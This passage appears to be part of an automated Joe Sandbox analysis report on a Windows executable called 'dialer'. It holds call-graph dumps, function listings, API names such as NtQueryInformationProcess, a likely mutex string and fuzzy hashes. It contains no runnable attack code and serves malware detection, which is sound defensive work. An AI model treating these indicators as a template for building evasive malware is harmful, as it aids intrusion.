2254->2255 2256 1400015a8 2255->2256 2257 140001394 2 API calls 2256->2257 2258 1400015b7 2257->2258 2259 140001394 2 API calls 2258->2259 2260 1400015c6 2259->2260 2261 140001394 2 API calls 2260->2261 2262 1400015d5 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015e4 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015f3 2265->2266 2266->2173 2267 140001503 2266->2267 2268 140001394 2 API calls 2267->2268 2269 14000150d 2268->2269 2270 140001394 2 API calls 2269->2270 2271 140001512 2270->2271 2272 140001394 2 API calls 2271->2272 2273 140001521 2272->2273 2274 140001394 2 API calls 2273->2274 2275 140001530 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000153f 2276->2277 2278 140001394 2 API calls 2277->2278 2279 14000154e 2278->2279 2280 140001394 2 API calls 2279->2280 2281 14000155d 2280->2281 2282 140001394 2 API calls 2281->2282 2283 14000156c 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000157b 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000158a 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001599 2288->2289 2290 140001394 2 API calls 2289->2290 2291 1400015a8 2290->2291 2292 140001394 2 API calls 2291->2292 2293 1400015b7 2292->2293 2294 140001394 2 API calls 2293->2294 2295 1400015c6 2294->2295 2296 140001394 2 API calls 2295->2296 2297 1400015d5 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015e4 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015f3 2300->2301 2301->2179 2302 14000156c 2301->2302 2303 140001394 2 API calls 2302->2303 2304 14000157b 2303->2304 2305 140001394 2 API calls 2304->2305 2306 14000158a 2305->2306 2307 140001394 2 API calls 2306->2307 2308 140001599 2307->2308 2309 140001394 2 API calls 2308->2309 2310 1400015a8 2309->2310 2311 140001394 2 API calls 2310->2311 2312 1400015b7 2311->2312 2313 140001394 2 API calls 2312->2313 2314 1400015c6 2313->2314 2315 140001394 2 API calls 2314->2315 2316 1400015d5 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015e4 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015f3 2319->2320 2320->2179 2321 14000145e 2320->2321 2322 140001394 2 API calls 2321->2322 2323 14000146d 2322->2323 2324 140001394 2 API calls 2323->2324 2325 14000147c 2324->2325 2326 140001394 2 API calls 2325->2326 2327 14000148b 2326->2327 2328 140001394 2 API calls 2327->2328 2329 14000149a 2328->2329 2330 140001394 2 API calls 2329->2330 2331 1400014a9 2330->2331 2332 140001394 2 API calls 2331->2332 2333 1400014b8 2332->2333 2334 140001394 2 API calls 2333->2334 2335 1400014c7 2334->2335 2336 140001394 2 API calls 2335->2336 2337 1400014d6 2336->2337 2338 1400014e5 2337->2338 2339 140001394 2 API calls 2337->2339 2340 140001394 2 API calls 2338->2340 2339->2338 2341 1400014ef 2340->2341 2342 1400014f4 2341->2342 2343 140001394 2 API calls 2341->2343 2344 140001394 2 API calls 2342->2344 2343->2342 2345 1400014fe 2344->2345 2346 140001503 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 14000150d 2348->2349 2350 140001394 2 API calls 2349->2350 2351 140001512 2350->2351 2352 140001394 2 API calls 2351->2352 2353 140001521 2352->2353 2354 140001394 2 API calls 2353->2354 2355 140001530 2354->2355 2356 140001394 2 API calls 2355->2356 2357 14000153f 2356->2357 2358 140001394 2 API calls 2357->2358 2359 14000154e 2358->2359 2360 140001394 2 API calls 2359->2360 2361 14000155d 2360->2361 2362 140001394 2 API calls 2361->2362 2363 14000156c 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000157b 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000158a 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001599 2368->2369 2370 140001394 2 API calls 2369->2370 2371 1400015a8 2370->2371 2372 140001394 2 API calls 2371->2372 2373 1400015b7 2372->2373 2374 140001394 2 API calls 2373->2374 2375 1400015c6 2374->2375 2376 140001394 2 API calls 2375->2376 2377 1400015d5 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015e4 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015f3 2380->2381 2381->2179 2383 140001394 2 API calls 2382->2383 2384 14000147c 2383->2384 2385 140001394 2 API calls 2384->2385 2386 14000148b 2385->2386 2387 140001394 2 API calls 2386->2387 2388 14000149a 2387->2388 2389 140001394 2 API calls 2388->2389 2390 1400014a9 2389->2390 2391 140001394 2 API calls 2390->2391 2392 1400014b8 2391->2392 2393 140001394 2 API calls 2392->2393 2394 1400014c7 2393->2394 2395 140001394 2 API calls 2394->2395 2396 1400014d6 2395->2396 2397 1400014e5 2396->2397 2398 140001394 2 API calls 2396->2398 2399 140001394 2 API calls 2397->2399 2398->2397 2400 1400014ef 2399->2400 2401 1400014f4 2400->2401 2402 140001394 2 API calls 2400->2402 2403 140001394 2 API calls 2401->2403 2402->2401 2404 1400014fe 2403->2404 2405 140001503 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 14000150d 2407->2408 2409 140001394 2 API calls 2408->2409 2410 140001512 2409->2410 2411 140001394 2 API calls 2410->2411 2412 140001521 2411->2412 2413 140001394 2 API calls 2412->2413 2414 140001530 2413->2414 2415 140001394 2 API calls 2414->2415 2416 14000153f 2415->2416 2417 140001394 2 API calls 2416->2417 2418 14000154e 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000155d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000156c 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000157b 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000158a 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001599 2427->2428 2429 140001394 2 API calls 2428->2429 2430 1400015a8 2429->2430 2431 140001394 2 API calls 2430->2431 2432 1400015b7 2431->2432 2433 140001394 2 API calls 2432->2433 2434 1400015c6 2433->2434 2435 140001394 2 API calls 2434->2435 2436 1400015d5 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015e4 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015f3 2439->2440 2440->2214 2441 140001530 2440->2441 2442 140001394 2 API calls 2441->2442 2443 14000153f 2442->2443 2444 140001394 2 API calls 2443->2444 2445 14000154e 2444->2445 2446 140001394 2 API calls 2445->2446 2447 14000155d 2446->2447 2448 140001394 2 API calls 2447->2448 2449 14000156c 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000157b 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000158a 2452->2453 2454 140001394 2 API calls 2453->2454 2455 140001599 2454->2455 2456 140001394 2 API calls 2455->2456 2457 1400015a8 2456->2457 2458 140001394 2 API calls 2457->2458 2459 1400015b7 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015c6 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015d5 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015e4 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015f3 2466->2467 2467->2205 2467->2206 2469 140001394 2 API calls 2468->2469 2470 1400014b8 2469->2470 2471 140001394 2 API calls 2470->2471 2472 1400014c7 2471->2472 2473 140001394 2 API calls 2472->2473 2474 1400014d6 2473->2474 2475 1400014e5 2474->2475 2476 140001394 2 API calls 2474->2476 2477 140001394 2 API calls 2475->2477 2476->2475 2478 1400014ef 2477->2478 2479 1400014f4 2478->2479 2480 140001394 2 API calls 2478->2480 2481 140001394 2 API calls 2479->2481 2480->2479 2482 1400014fe 2481->2482 2483 140001503 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 14000150d 2485->2486 2487 140001394 2 API calls 2486->2487 2488 140001512 2487->2488 2489 140001394 2 API calls 2488->2489 2490 140001521 2489->2490 2491 140001394 2 API calls 2490->2491 2492 140001530 2491->2492 2493 140001394 2 API calls 2492->2493 2494 14000153f 2493->2494 2495 140001394 2 API calls 2494->2495 2496 14000154e 2495->2496 2497 140001394 2 API calls 2496->2497 2498 14000155d 2497->2498 2499 140001394 2 API calls 2498->2499 2500 14000156c 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000157b 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000158a 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001599 2505->2506 2507 140001394 2 API calls 2506->2507 2508 1400015a8 2507->2508 2509 140001394 2 API calls 2508->2509 2510 1400015b7 2509->2510 2511 140001394 2 API calls 2510->2511 2512 1400015c6 2511->2512 2513 140001394 2 API calls 2512->2513 2514 1400015d5 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015e4 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015f3 2517->2518 2518->2210 2519 140001440 2518->2519 2520 140001394 2 API calls 2519->2520 2521 14000144f 2520->2521 2522 140001394 2 API calls 2521->2522 2523 14000145e 2522->2523 2524 140001394 2 API calls 2523->2524 2525 14000146d 2524->2525 2526 140001394 2 API calls 2525->2526 2527 14000147c 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000148b 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000149a 2530->2531 2532 140001394 2 API calls 2531->2532 2533 1400014a9 2532->2533 2534 140001394 2 API calls 2533->2534 2535 1400014b8 2534->2535 2536 140001394 2 API calls 2535->2536 2537 1400014c7 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400014d6 2538->2539 2540 1400014e5 2539->2540 2541 140001394 2 API calls 2539->2541 2542 140001394 2 API calls 2540->2542 2541->2540 2543 1400014ef 2542->2543 2544 1400014f4 2543->2544 2545 140001394 2 API calls 2543->2545 2546 140001394 2 API calls 2544->2546 2545->2544 2547 1400014fe 2546->2547 2548 140001503 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 14000150d 2550->2551 2552 140001394 2 API calls 2551->2552 2553 140001512 2552->2553 2554 140001394 2 API calls 2553->2554 2555 140001521 2554->2555 2556 140001394 2 API calls 2555->2556 2557 140001530 2556->2557 2558 140001394 2 API calls 2557->2558 2559 14000153f 2558->2559 2560 140001394 2 API calls 2559->2560 2561 14000154e 2560->2561 2562 140001394 2 API calls 2561->2562 2563 14000155d 2562->2563 2564 140001394 2 API calls 2563->2564 2565 14000156c 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000157b 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000158a 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001599 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015a8 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015b7 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400015c6 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400015d5 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015e4 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015f3 2582->2583 2583->2210 2583->2217 2585 1400014e5 2584->2585 2586 140001394 2 API calls 2584->2586 2587 140001394 2 API calls 2585->2587 2586->2585 2588 1400014ef 2587->2588 2589 1400014f4 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014fe 2591->2592 2593 140001503 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 14000150d 2595->2596 2597 140001394 2 API calls 2596->2597 2598 140001512 2597->2598 2599 140001394 2 API calls 2598->2599 2600 140001521 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001530 2601->2602 2603 140001394 2 API calls 2602->2603 2604 14000153f 2603->2604 2605 140001394 2 API calls 2604->2605 2606 14000154e 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000155d 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000156c 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000157b 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000158a 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001599 2615->2616 2617 140001394 2 API calls 2616->2617 2618 1400015a8 2617->2618 2619 140001394 2 API calls 2618->2619 2620 1400015b7 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015c6 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015d5 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015e4 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015f3 2627->2628 2628->2234 2630 140001394 2 API calls 2629->2630 2631 14000158a 2630->2631 2632 140001394 2 API calls 2631->2632 2633 140001599 2632->2633 2634 140001394 2 API calls 2633->2634 2635 1400015a8 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015b7 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015c6 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015d5 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015e4 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015f3 2644->2645 2645->2234 2647 140001394 2 API calls 2646->2647 2648 1400015b7 2647->2648 2649 140001394 2 API calls 2648->2649 2650 1400015c6 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015d5 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015e4 2653->2654 2655 140001394 2 API calls 2654->2655 2656 1400015f3 2655->2656 2656->2234 2658 140001394 2 API calls 2657->2658 2659 140001530 2658->2659 2660 140001394 2 API calls 2659->2660 2661 14000153f 2660->2661 2662 140001394 2 API calls 2661->2662 2663 14000154e 2662->2663 2664 140001394 2 API calls 2663->2664 2665 14000155d 2664->2665 2666 140001394 2 API calls 2665->2666 2667 14000156c 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000157b 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000158a 2670->2671 2672 140001394 2 API calls 2671->2672 2673 140001599 2672->2673 2674 140001394 2 API calls 2673->2674 2675 1400015a8 2674->2675 2676 140001394 2 API calls 2675->2676 2677 1400015b7 2676->2677 2678 140001394 2 API calls 2677->2678 2679 1400015c6 2678->2679 2680 140001394 2 API calls 2679->2680 2681 1400015d5 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015e4 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015f3 2684->2685 2685->2234 2687 140001394 2 API calls 2686->2687 2688 140001431 2687->2688 2689 140001394 2 API calls 2688->2689 2690 140001440 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000144f 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000145e 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000146d 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000147c 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000148b 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000149a 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400014a9 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400014b8 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400014c7 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400014d6 2709->2710 2711 1400014e5 2710->2711 2712 140001394 2 API calls 2710->2712 2713 140001394 2 API calls 2711->2713 2712->2711 2714 1400014ef 2713->2714 2715 1400014f4 2714->2715 2716 140001394 2 API calls 2714->2716 2717 140001394 2 API calls 2715->2717 2716->2715 2718 1400014fe 2717->2718 2719 140001503 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 14000150d 2721->2722 2723 140001394 2 API calls 2722->2723 2724 140001512 2723->2724 2725 140001394 2 API calls 2724->2725 2726 140001521 2725->2726 2727 140001394 2 API calls 2726->2727 2728 140001530 2727->2728 2729 140001394 2 API calls 2728->2729 2730 14000153f 2729->2730 2731 140001394 2 API calls 2730->2731 2732 14000154e 2731->2732 2733 140001394 2 API calls 2732->2733 2734 14000155d 2733->2734 2735 140001394 2 API calls 2734->2735 2736 14000156c 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000157b 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000158a 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001599 2741->2742 2743 140001394 2 API calls 2742->2743 2744 1400015a8 2743->2744 2745 140001394 2 API calls 2744->2745 2746 1400015b7 2745->2746 2747 140001394 2 API calls 2746->2747 2748 1400015c6 2747->2748 2749 140001394 2 API calls 2748->2749 2750 1400015d5 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015e4 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015f3 2753->2754 2754->2234 2756 140001394 2 API calls 2755->2756 2757 140001440 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000144f 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000145e 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000146d 2762->2763 2764 140001394 2 API calls 2763->2764 2765 14000147c 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000148b 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000149a 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400014a9 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400014b8 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400014c7 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400014d6 2776->2777 2778 1400014e5 2777->2778 2779 140001394 2 API calls 2777->2779 2780 140001394 2 API calls 2778->2780 2779->2778 2781 1400014ef 2780->2781 2782 1400014f4 2781->2782 2783 140001394 2 API calls 2781->2783 2784 140001394 2 API calls 2782->2784 2783->2782 2785 1400014fe 2784->2785 2786 140001503 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 14000150d 2788->2789 2790 140001394 2 API calls 2789->2790 2791 140001512 2790->2791 2792 140001394 2 API calls 2791->2792 2793 140001521 2792->2793 2794 140001394 2 API calls 2793->2794 2795 140001530 2794->2795 2796 140001394 2 API calls 2795->2796 2797 14000153f 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000154e 2798->2799 2800 140001394 2 API calls 2799->2800 2801 14000155d 2800->2801 2802 140001394 2 API calls 2801->2802 2803 14000156c 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000157b 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000158a 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001599 2808->2809 2810 140001394 2 API calls 2809->2810 2811 1400015a8 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015b7 2812->2813 2814 140001394 2 API calls 2813->2814 2815 1400015c6 2814->2815 2816 140001394 2 API calls 2815->2816 2817 1400015d5 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015e4 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015f3 2820->2821 2821->2234

                                                                          Callgraph

                                                                          • Executed
                                                                          • Not Executed
                                                                          • Opacity -> Relevance
                                                                          • Disassembly available
                                                                          callgraph 0 Function_0000000140001AE4 30 Function_0000000140001D40 0->30 73 Function_0000000140001BA0 0->73 1 Function_00000001400014E5 68 Function_0000000140001394 1->68 2 Function_00000001400010F0 3 Function_00000001400030F1 4 Function_00000001400058F1 5 Function_00000001400014F4 5->68 6 Function_0000000140002500 7 Function_0000000140001800 62 Function_0000000140002290 7->62 8 Function_0000000140001000 9 Function_0000000140001E00 8->9 37 Function_0000000140001750 8->37 79 Function_0000000140001FB0 8->79 86 Function_0000000140001FC0 8->86 10 Function_0000000140002F00 51 Function_0000000140001370 10->51 11 Function_0000000140005801 12 Function_0000000140005A01 13 Function_0000000140001503 13->68 14 Function_0000000140001404 14->68 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140003110 18 Function_0000000140001512 18->68 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140001521 21->68 22 Function_0000000140005821 23 Function_0000000140001422 23->68 24 Function_0000000140001530 24->68 25 Function_0000000140003130 26 Function_0000000140001431 26->68 27 Function_0000000140005931 28 Function_000000014000153F 28->68 29 Function_0000000140001440 29->68 30->62 31 Function_0000000140001140 45 Function_0000000140001160 31->45 32 Function_0000000140005841 33 Function_0000000140001F47 52 Function_0000000140001870 33->52 34 Function_0000000140002050 35 Function_0000000140005D50 60 Function_0000000140005A90 35->60 36 Function_0000000140003150 36->10 36->13 36->21 36->23 36->24 36->26 36->28 36->29 42 Function_000000014000145E 36->42 44 Function_0000000140002660 36->44 48 Function_000000014000156C 36->48 49 Function_000000014000146D 36->49 36->51 58 Function_000000014000157B 36->58 36->60 76 Function_00000001400015A8 36->76 77 Function_00000001400014A9 36->77 85 Function_00000001400016C0 36->85 97 Function_00000001400014D6 36->97 98 Function_00000001400026E0 36->98 38 Function_0000000140001650 39 Function_0000000140005751 40 Function_0000000140003051 41 Function_000000014000155D 41->68 42->68 43 Function_0000000140002460 45->36 45->45 45->52 59 Function_0000000140001880 45->59 61 Function_0000000140001F90 45->61 45->85 46 Function_0000000140001760 99 Function_00000001400020E0 46->99 47 Function_0000000140001E65 47->52 48->68 49->68 50 Function_000000014000216F 53 Function_0000000140001A70 53->30 53->73 54 Function_0000000140003070 55 Function_0000000140005A70 56 Function_0000000140005771 57 Function_0000000140005871 58->68 59->19 59->30 59->44 59->73 63 Function_0000000140002590 64 Function_0000000140003090 65 Function_0000000140002691 66 Function_0000000140005791 67 Function_0000000140005891 68->35 72 Function_0000000140005AA0 68->72 69 Function_0000000140002194 69->52 70 Function_000000014000219E 71 Function_0000000140001FA0 72->60 73->30 78 Function_00000001400023B0 73->78 92 Function_00000001400024D0 73->92 74 Function_00000001400058A0 75 Function_00000001400059A1 76->68 77->68 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400057B1 84 Function_0000000140001AB3 84->30 84->73 87 Function_00000001400058C1 88 Function_00000001400059C1 89 Function_0000000140001AC3 89->30 89->73 90 Function_00000001400014C7 90->68 91 Function_00000001400026D0 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->30 96->73 97->68 98->1 98->5 98->13 98->18 98->41 98->42 98->44 98->51 98->60 98->77 98->90 100 Function_00000001400017E0 100->99 101 Function_00000001400022E0

                                                                          Executed Functions

                                                                          Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: InformationProcessQuery
                                                                          • String ID:
                                                                          • API String ID: 1778838933-0
                                                                          • Opcode ID: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                          • Instruction ID: db77473c3d931d0fcdff88eb00413d93014a399b348e2779a93e53daa222875a
                                                                          • Opcode Fuzzy Hash: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                          • Instruction Fuzzy Hash: 0BF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                                          Non-executed Functions

                                                                          Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a90 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$\BaseNamedObjects\krwgvaizwkrekxljjkewdlmp$`
                                                                          • API String ID: 597572034-4019176162
                                                                          • Opcode ID: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                          • Instruction ID: 6d2fbcda24ca89716a86bde41687ff7fffd3aad73cb8576b26b5126aeab97ea9
                                                                          • Opcode Fuzzy Hash: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                          • Instruction Fuzzy Hash: 5F1248B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700
                                                                          Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                          • Instruction ID: f5b649809ecdb1e3254532f3c56674770b0d491324e0a3fa73df4e492b336c57
                                                                          • Opcode Fuzzy Hash: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                          • Instruction Fuzzy Hash: DA5122B1A11A4085FB16EF27F9947EA27A5AB8D7D0F808121FB4D873B6DE38C4958300
                                                                          Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
